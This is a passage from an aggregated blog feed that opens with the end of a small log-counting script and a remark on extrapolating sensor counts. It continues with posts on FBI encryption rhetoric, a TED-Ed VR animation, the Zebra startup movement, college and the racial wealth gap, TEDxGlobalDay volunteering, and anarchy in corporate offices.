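    return {name: len(srcs) for name, srcs in classify(events).items()}


if __name__ == "__main__":
    print(summarize(SAMPLE_LOG))
```

The function reports only what the sensor saw, deduplicated by source; scaling that to a global figure is a separate step, and the disagreement in the article is about that step rather than the counting. Check Point's own wording ("we assume the numbers globally are much higher") marks the order-of-magnitude extrapolation as an assumption, which is exactly what a report built on this kind of count should say out loud.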

CryptogramFBI Increases Its Anti-Encryption Rhetoric

Earlier this month, Deputy Attorney General Rod Rosenstein gave a speech warning that a world with encryption is a world without law -- or something like that. The EFF's Kurt Opsahl takes it apart pretty thoroughly.

Last week, FBI Director Christopher Wray said much the same thing.

This is an idea that will not die.

Rondam RamblingsThe utter absurdity of the pro-life position

I can think of no better example of erudition without substance than George Will's recent column in the Washington Post entitled, "Democrats are the real abortion extremists."  On the surface his argument seems eminently reasonable: the legal regimen regarding abortion in the U.S. is too mathematically neat and tidy to have any basis in either law or scientific fact, and so clinging to this

Worse Than FailureError'd: Trick or Treat? Smell My Feet

"Sorry, but 4.2 billion Microsoft points sounds like 'all tricks' to me," writes Ergin S.

 

"Most paints are air-drying, but with this one, you apparently need to, um, assist with the air flow a bit," wrote Peter G. (Side Note: For fun, go ahead and google the item title.)

 

Dave P. writes, "Um, The US Supreme Court is patching Android within to decide Microsoft email privacy dispute!? Thanks Slashdot!"

 

"Why yes, it's the first time that I've seen this network at the workplace," wrote Wouter.

 

Adam L. writes, "And here I thought you only got to celebrate a trip around the sun once per year. Neat!"

 

"You guys! My iPhone is DAMAGED! Thankfully there's an app on the Google Play store that can fix it!" I found this one.

 

Planet Linux AustraliaOpenSTEM: Happy Teachers’ Day

OpenSTEM would like to extend warm congratulations to all teachers on Teachers’ Day!! We salute you all for the wonderful job you do for all students every day, often without thanks or praise. It is not lightly that people say “If you can read this, thank a teacher”. Teachers truly are the force that shapes […]

Planet Linux AustraliaOpenSTEM: This Week in HASS – term 4, week 4

This week our youngest students are looking at Aboriginal Places, while slightly older students are comparing Australia to other places around the world. Our older students are starting their class election segment of work, covering several parts of the Civics and Citizenship, as well as the History, curricula. Foundation/Kindy/Prep to Year 3 Students in Foundation/Kindy/Prep […]

TEDThe making of TED-Ed’s first 360° animation

 

Virtual reality is an emerging medium for artists and educators. Painting is an ancient art form; some cave paintings were made up to 40,000 years ago. In TED-Ed’s first 360° animated video, you can examine the intersection of these two ideas by exploring an ancient cave and its surroundings as educator Iseult Gillespie shares a brief history of cave paintings. Below, animation director Michael “Lippy” Lipman shares a few tips, sketches and stories from the making of this special animation.

As director of the very first TED-Ed VR animated short, you worked with an ace team to bring hand-drawn animation and educational content to life in a new genre: the emerging medium of 360° 2D stereoscopic VR animation. How difficult was it to pull that rabbit out of the hat?

Generally I can say that pulling together all of the various technologies and production artists to make this happen was probably THE most daunting production challenge I’ve ever encountered in my 25 years of working in animation. There is simply no “one product solution” at this point in VR’s production adolescence.

To get from the original concept idea to a working final product required cobbling together a “tech salad” of software solutions. And to make it even more challenging, the final presentation platform — Google Cardboard video presented on YouTube — kept iterating throughout our production process. So that in itself was a moving target which made our ability to cross the finish line more precarious by the month! Happily, we were pretty ruthless and focused in our desire to create a VR cartoon. I’m glad we persevered.

When did you start working on this particular animation project with TED-Ed?

I received my first Cardboard player in my New York Times Sunday delivery in the fall of 2015. I’d been reading about the platform, but when the viewer just showed up in my living room I immediately realized that millions of NYT readers now had access to Cardboard-based content. I made a decision that morning to create cartoons for the platform!

I thought long and hard about what kinds of content would work well in the 360° VR world and pretty quickly came to the idea that a narrator-driven vehicle could work very well in a medium where the viewer can be looking at any point in the 360° sphere at any time. This is a massive challenge for traditional narrative cinema because the director is not fully in charge of choosing the audience’s focus. And though I certainly had to deal with many of the same challenges as an animation director, I knew that the inclusion of a voiceover narrator would make my job easier by directing the viewer to look for specific visuals within the world I would create.

Early concept art included this flat, panoramic painting of the inside of the cave. Art credit: Lippy/TED-Ed

Why did you suggest the topic of prehistoric cave paintings for this video?

Well, once I’d gotten the Cardboard viewer I began to gorge myself on any and all of the 360° VR content I could find. I knew that I wanted to make the piece as a hand-drawn 2D animated short. Having set that criteria, it then dawned on me that I’d be required to design, paint, and perhaps animate an entire world in not only 360 degrees horizontally, but vertically too. This type of world creation is a sort of “given” in 3D animation production. But working in 2D would require a different approach, and a new way of visualizing the experience that I hadn’t thought of before. I panicked. I wondered what I’d gotten myself into. Eventually I calmed down and realized that working inside a confined space would fit the project well and allow me to create visual “fences” beyond which the viewer wouldn’t be interested in looking. Initially I thought the subject of the piece could center around a part/system of the human body where the viewer would be inside the blurry, rose-colored walls of some organs or something. Then I hit upon the idea of a cave and it was a fairly quick leap from just any cave to a specific cave which housed prehistoric paintings. I was energized, and proposed this cave painting idea to TED-Ed, who also agreed that it was a good source of educational and visual promise.

Storyboards for the ‘Mid-Cave’ Shaman sequence. Art credit: Lippy/TED-Ed

What kind of creative challenges did you face in designing for a 360-degree visual storytelling environment?

There were a lot of technical challenges in learning about how exactly to create artwork on a flat computer monitor and have it look “right” within the 360° sphere of the cave. This took weeks and months of trial and error to come up with a system that was rock solid. By now, the technical targets will likely have iterated again and our “bullet-proof” process will need to be upgraded.

Technical issues aside, perhaps the biggest challenge was in how to present the educational highlights of the text without requiring the viewer to be looking at a certain place at a certain time. This was a huge conceptual mountain to climb. I decided that the best teaching method for this particular short would be to create a few large set pieces (inside a cave, outside overlooking a prehistoric meadow) and let the voiceover just run atop it all while the action played out beneath. Generally the “business” of the characters and situations happen in their own pacing and feel integrated with what the narrator is saying, but they are not slavishly tied to every educational point being made. I wanted to bolster the viewer’s freedom to look anywhere at any time.

Preliminary sketches for the ‘Shaman’ character. Art credit: Lippy/TED-Ed

Are there any sights, sounds, or hand-drawn scenes in this lesson that you specifically want to highlight for the TED community?

I put a lot of time and animation effort into getting the masked Shaman to walk correctly and hop with weight and determination. I cracked open some of my favorite animation ‘how to’ books and refreshed my knowledge of the basics of character animation. I designed the Shaman’s entire entrance and trance sequence by using tiny thumbnails, then turning those thumbnails into stick figures, and finally fleshing out those stick figures into finished poses. I worked with a digital tablet and pen when doing all of the final line work for the Shaman and the entire piece. I started the process with pencils (for storyboards and thumbnail designs) but jumped to digital pen as soon as I could, to reduce having to duplicate efforts across multiple media.

As far as spatial depth goes, I’ll direct your readers to notice the layers of stereoptic layering that my production partners at Idle Hands Studios created. This tech didn’t exist “right out of the box” with any current software package. The geniuses at IH wrote some discrete code for this TED-Ed project so that when the viewer turns in any direction the layers of depth remain consistent. That sounds like it should be a straightforward feature available in any 360° VR production package. But it’s actually a huge hole in the system right now and requires individual solutions for each situation.

Is there anything else you’d like to share with readers about the experience of directing this experiment?

Only that the producers at TED-Ed have been amazingly supportive and patient with this production. They realized from the beginning that I was attempting to do something new and that really hadn’t been done before (2D hand-drawn animation in 360° VR). They were as excited as I was and they never wavered in their support even though I traversed some very stressful chasms in trying to find a production solution which would take us to a successful end.

Would you want to do more of these video productions?

We’re already talking about the next one!

Want to view this TED-Ed animated 360° video?

If you have access to a Google Cardboard viewer and a smart phone:

  1. Open this video in the YouTube app on your phone.
  2. Hit pause on the video.
  3. Tap the 3 vertical dots on the top right corner of the view window. This will slide up a sub-menu where you will choose the quality setting of your video stream. Choose “2160s.” Note that if you are not streaming over Wifi, YouTube will only allow “720s” quality.
  4. Tap on the “Cardboard viewer” icon on the bottom row of the video window (it looks like a mask). This will present the video full screen in prep for the Cardboard viewer.
  5. The screen is now divided into 2 halves, separated by a thin white line that runs halfway up the screen. Make sure to rotate your phone so that this thin line is coming from the bottom of the screen. This ensures proper stereoscopic depth.
  6. Insert your phone into the Cardboard viewer and press play. The video will begin. Enjoy!

If you do not have access to a Cardboard or smart phone:

  1. You can watch on your browser. Use your mouse to drag and explore the space above, below, and behind you. Enjoy!

This article was adapted for the TED Blog from this TED-Ed blog post


LongNowCan “Zebras” Fix What “Unicorns” Break?

Long Now Partners with Zebra Movement to Help Bring Long-Term Thinking to Startups and Venture Capital

The disruptive potential of Silicon Valley, epitomized in the mantra to “move fast and break things”, was once praised as its killer feature. These days, it is increasingly perceived as a bug.  Startups come and go, but the underlying structure of tech and venture capital persists. Entrepreneurs and investors have grown accustomed to the idea of limited runway, quick exits, and short-term gains, while accepting a 90% failure rate among startups as simply the cost of admission for playing the game. “Growth becomes the overriding motivation,” Noam Cohen wrote in a recent piece for The New York Times. “Something treasured for its own sake, not for anything it brings to the world.”

Entrepreneurs Jennifer Brandel, Mara Zepeda, Astrid Scholz, and Aniyia Williams are after a different sort of disruption—one that transforms tech and venture capital through long-term thinking and alternative business models that result in both profit and social impact. They call their project the Zebra Movement.

Founders of the Zebra Movement. From left: Jennifer Brandel, Co-Founder and CEO of Hearken; Mara Zepeda, Co-Founder and CEO of Switchboard; Astrid Scholz, Co-Founder and CEO of Sphaera; and Aniyia Williams, Co-Founder and CEO of Tinsel / Black & Brown Founders.

It started in 02016, when the Zebra founders wrote a provocative essay that deployed sex metaphors to critique the startup status quo of chasing “unicorns”:

Much is made about Silicon Valley’s culture of “innovation.” But the model for startup venture financing, and the system of rewards driving this supposed innovation, isn’t creative — it’s masturbatory. It wastes potential. It’s uninspired. It leaves founders like us staring at the ceiling.

Yes, we want to build businesses that succeed financially. But we also want so much more than that, and we aren’t alone. Most of the founders we know, many of whom happen to be women, are driven to build companies that generate money and meaning. And they’re in it for the long haul — not just to get their jollies, make their names, and exit.

The essay went viral, generating responses from hundreds of founders, investors, and advocates. The Zebra founders followed with a manifesto earlier this year to provide the beginnings of a solution to what they called the “broken” structure of technology and venture capital.

This is an urgent problem. For in this game, far more than money is at stake. When VC firms prize time on site over truth, a lucky few may profit, but civil society suffers. When shareholder return trumps collective well-being, democracy itself is threatened. The reality is that business models breed behavior, and at scale, that behavior can lead to far-reaching, sometimes destructive outcomes.

[…]

A company’s business model is the first domino in a long chain of consequences. In short: “The business model is the message.” From that business model flows company culture and beliefs, strategies for success, end-user experiences, and, ultimately, the very shape of society.

We believe that developing alternative business models to the startup status quo has become a central moral challenge of our time. These alternative models will balance profit and purpose, champion democracy, and put a premium on sharing power and resources. Companies that create a more just and responsible society will hear, help, and heal the customers and communities they serve.

The founders enlisted the Zebra as the symbol for their movement:

Why zebras?

  • To state the obvious: unlike unicorns, zebras are real.
  • Zebra companies are both black and white: they are profitable and improve society. They won’t sacrifice one for the other.
  • Zebras are also mutualistic: by banding together in groups, they protect and preserve one another. Their individual input results in stronger collective output.
  • Zebra companies are built with peerless stamina and capital efficiency, as long as conditions allow them to survive.

Thousands responded after the Zebra founders proposed a conference to gather together and further define the goals and ethos of their movement. DazzleCon (a “dazzle” being a gathering of zebras) will be taking place from Wednesday, November 15 to Friday, November 17, 02017 in Portland, Oregon. Long Now has joined the Rockefeller Foundation, the MacArthur Foundation, and the Knight Foundation, among others, in supporting the Zebra founders by sharing resources, ideas and strategy for considering and applying long-term thinking to the growing conversation within the movement. We will be co-partnering with DazzleCon for the evening program of keynote talks on Wednesday, November 15. (The evening program is open to the public; Long Now members can receive a $15 discount by entering the promo code LONGNOWDAZZLE on the Eventbrite page.)

We asked one of the founders, Mara Zepeda, to reflect on the role she believes long-term thinking should play in technology and Silicon Valley:

I grew up with many tattered copies of the Whole Earth Catalog. I would later connect with Howard Rheingold, who sits at the intersection of the Whole Earth Catalog ethos and technology, as a friend and teacher (we also both graduated from Reed College). I believe the deep, nuanced, systems thinking approach the Long Now Foundation promotes is so necessary in today’s culture. As the co-founder and CEO of a technology company, I’ve noticed its absence most acutely in technology, where a pervasive “winner takes all” culture of investor profits, billion dollar companies, and quick exits reigns supreme. Long-term thinking is what is so desperately needed in these times.

We need to return to the values of thinkers like Stewart Brand, Alan Kay, Howard Rheingold, Christopher Alexander, and Douglas Engelbart who believed that technology should augment humans, and create thriving ecosystems of collective intelligence.

In The Clock of the Long Now, Stewart Brand quotes institutional management advisor Rosabeth Moss Kanter. The gist is that people who take the long view will do so when they trust their leaders, the rules of the game are fair, they will share equitably in the returns, and feel a commitment to those who come after them. Zebra companies embody and promote these values of trust, shared prosperity, and a long-term investment in the earth, community, and each other.

Aligning around these principles creates better people, more ethical products, cooperative communities, and a kinder and more equitable world. We are thrilled to partner and share this wealth of knowledge across disciplines and generations.

If you’re interested in attending DazzleCon, or would like to know more about the Zebra Movement, head here. To attend the evening program at a discounted rate, enter LONGNOWDAZZLE on the Eventbrite page.

Sociological ImagesCollege pays…if you’re white

The staff at How Much recently visualized summaries from a Federal Reserve analysis showing how much a college degree can matter for your net worth. It turns out education can really pay…if you’re white.

This illustrates an important sociological point. When we talk about structural inequality, critics often note that we shouldn’t disregard individuals’ efforts to work and earn a better life. Getting a college degree is one of the centerpieces of this argument. These gaps show it’s not that effort doesn’t matter at all, but that inequality in social conditions means those efforts yield wildly different outcomes.

Want to read more on higher education and America’s wealth gap? Check out Tressie McMillan Cottom’s Lower Ed, Thomas Shapiro’s Toxic Inequality, and Dalton Conley’s Being Black, Living in the Red.

Evan Stewart is a Ph.D. candidate in sociology at the University of Minnesota. You can follow him on Twitter.

(View original at https://thesocietypages.org/socimages)

TED8 ways TEDxers gave back on TEDxGlobalDay

The spirit of the TEDx community shone brightly during the first TEDxGlobalDay in September. In this dynamic one-day initiative, more than 5,000 TEDxers from 230 cities in 76 countries set out to prove that local action can spark global conversations.

The day was broken up into three parts, organized by local hosts who managed teams of around 20 people each. Each team watched the talks from TEDGlobal>NYC, talked about ways to foster change in their communities, and then went out into the field to volunteer: Teams cleaned up public spaces, helped with hurricane relief, visited local schools and orphanages to deliver necessary supplies and visit with the children, and helped spread awareness about mental health issues.

Take a look at what some of the teams did — and check out the TEDxGlobalDay Facebook page for more examples.

People stand over a large pot of stew, as a woman serves a plate of food with help from a colleague.

Beirut, Lebanon

The team from TEDxLAU joined up with FoodBlessed, a volunteer organization that fights food poverty in Lebanon. Together, they helped to serve a weekly meal for those in need.

A group of volunteers stand together holding full trash bags and smiling.

Lagos, Nigeria

In Nigeria, TEDx teams talked with a local recycling company about the importance of proper waste disposal. They then went out to tidy up the streets of Lagos and interact with locals to share what they learned.

A woman leans down to till earth and compost.

Jakarta, Indonesia

TEDxJakarta went to an urban garden to learn more about the benefits of composting. They learned about how using their leftover food as fertilizer helps reduce waste, and got their hands dirty as they practiced how to grow their own food with it.

A young woman stands amid laid out blankets in a room, as a man lays another out.

Santa Clara, California

The team from TEDxLosGatosHighSchool made blankets and pet beds, then delivered them to a local animal shelter.

Two men pat at the earth around a newly planted sapling

Bangalore, India

TEDxers kicked things off with a welcoming dance, followed by rose milk and samosas. After the talks, the team went to visit an orphanage for differently abled kids, where they put on a song-and-dance performance and helped plant tree saplings on the grounds.

A group of people stand together holding full trash bags.

Chiang Mai, Thailand

The TEDxChiangMai team went out into the streets for a two-part activity. They took a walk around the center of town to clean up the streets, and also kicked off a “no straw” campaign that encourages people to switch from disposable plastic straws to those made from stainless steel, bamboo or papaya fibers.

An energetic group of people. A woman in the middle throws a paper plane that is mid-flight.

Tehran, Iran

The TEDxTehran team spent the day discussing Iran’s economy, specifically how to find solutions to the current recession. They broke up into small groups, and each created a mini model of Iran’s economy to test their ideas. In this activity, each group built their own “paper airplane factory” and received an order for 18 paper airplanes. Their goal: produce beautiful high-quality paper airplanes based on some of the solutions they had brainstormed.

Shamāl Kurdufān, Sudan

The TEDXALUbayyid team spent the day working with orphaned children. At a local school for orphans, they helped to build new classrooms and spent time picking up garbage around the grounds, to create a clean, happy space for the kids.


Planet Linux Australia: Russell Coker: Anarchy in the Office

Some of the best examples I’ve seen of anarchy working have been in corporate environments. This doesn’t mean that they were perfect or even as good as a theoretical system in which a competent manager controlled everything, but they often worked reasonably well.

In a well-functioning team, members will encourage others to do their share of the work in the absence of management. So when the manager disappears (doesn’t visit the team more than once a week and doesn’t ask for any meaningful feedback on how things are going) things can still work out. When someone who is capable of doing work isn’t working, other people will suggest that they do their share. If resources for work (such as a sufficiently configured PC for IT work) aren’t available then they can be found (abandoned PCs get stripped and the parts used to upgrade the PCs that need it most).

There was one time where a helpdesk worker who was about to be laid off was assigned to the same office as me (apparently making all the people in his group redundant took some time). So I started teaching him sysadmin skills, assigned work to him, and then recommended that my manager get him transferred to my group. That worked well for everyone.

One difficult case is employees who get in the way of work being done, those who are so incompetent that they break enough things to give negative productivity. One time when I was working in Amsterdam I had two colleagues like that; it turned out that the company had no problem with employees viewing porn at work, so no-one asked them to stop looking at porn. Having them paid to look at porn 40 hours a week was much better than having them try to do work. With anarchy there’s little option to get rid of bad people, so just having them hang out and do no work was the only option. I’m not advocating porn at work (it makes for a hostile work environment), but managers at that company did worse things.

One company I worked for appeared (from the non-management perspective) to have a management culture of doing no work. During my time there I did two “annual reviews” in two weeks, and the second was delayed by over 6 months. The manager in question only did the reviews at that time because he was told he couldn’t be promoted until he got the backlog of reviews done, so apparently being more than a year behind in annual reviews was no obstacle to being selected for promotion. On one occasion I raised the issue of a colleague who had done no work for over a year (and didn’t even have a PC to do work) with that manager; his response was “what do you expect me to do”! I expected him to do anything other than blow me off when I reported such a serious problem! But in spite of that strictly work-optional culture enough work was done and the company was a leader in its field.

There has been a lot of research into the supposed benefits of bonuses etc., which usually turn out to reduce productivity. Such research is generally ignored, presumably because the people who are paid the most are the ones who get to decide whether financial incentives should be offered, so they choose the compensation model for the company that benefits themselves. But the fact that teams can be reasonably productive when some people are paid to do nothing and most people have their work allocated by group consensus rather than management plan seems to be a better argument against the typical corporate management.

I think it would be interesting to try to run a company with an explicit anarchic management and see how it compares to the accidental anarchy that so many companies have. The idea would be to have minimal management that just does the basic HR tasks (preventing situations of bullying etc.), a flat pay rate for everyone (no bonuses, pay rises, etc.) and have workers decide how to spend money for training, facilities, etc. Instead of having middle managers you would have representatives elected from each team to represent their group to senior management.

PS Australia has some of the strictest libel laws in the world. Comments that identify companies or people are likely to be edited or deleted.